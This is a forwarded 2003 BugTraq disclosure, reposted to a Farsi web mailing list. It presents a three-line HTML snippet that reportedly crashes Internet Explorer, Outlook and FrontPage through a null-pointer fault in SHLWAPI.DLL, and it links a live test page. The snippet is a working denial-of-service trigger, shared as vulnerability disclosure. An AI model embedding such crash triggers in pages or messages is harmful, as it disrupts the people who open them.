take a look at this mail. you can find the example at: - http://esfahbod.info/proj/web/test/ie/crash.html
i'd tested the page with IE6 SP1 (latest microsoft update), and it crashed too! -------------------------------------------------------------------------- To: BugTraq Subject: IE / Outlook / MS SHLWAPI Render - more trivial crash Date: Apr 21 2003 10:07PM Author: Ramon Pinuaga Cascales <[EMAIL PROTECTED]> Message-ID: <[EMAIL PROTECTED]> In-Reply-To: <[EMAIL PROTECTED]> Hola: Well, as it seems that is the Microsoft Crash mounth, let see another one: --------------------------------- <html> <form> <input type crash> </form> </html> --------------------------------- This will crash IE with the following error: "Unhandled exception in iexplore.exe (SHLWAPI.DLL): 0xC0000005: Access Violation" It's a null pointer overwrite, so it's not easly exploitable... This HTML also crash Outlook, Frontpage, and all the Microsoft programs that use the shlwapi.dll library to render web code. Plain HTML is a dangerous language :) -- Saludos, Ramon Pinuaga Cascales mailto:[EMAIL PROTECTED] Analista de Seguridad Telematica Tfno: 620921960 -- -------------------------------------------------------------------------- -- Behnam Esfahbod ......[ http://esfahbod.info | behnam(a)esfahbod.info ] _______________________________________________ FarsiWeb mailing list [EMAIL PROTECTED] http://lists.sharif.edu/mailman/listinfo/farsiweb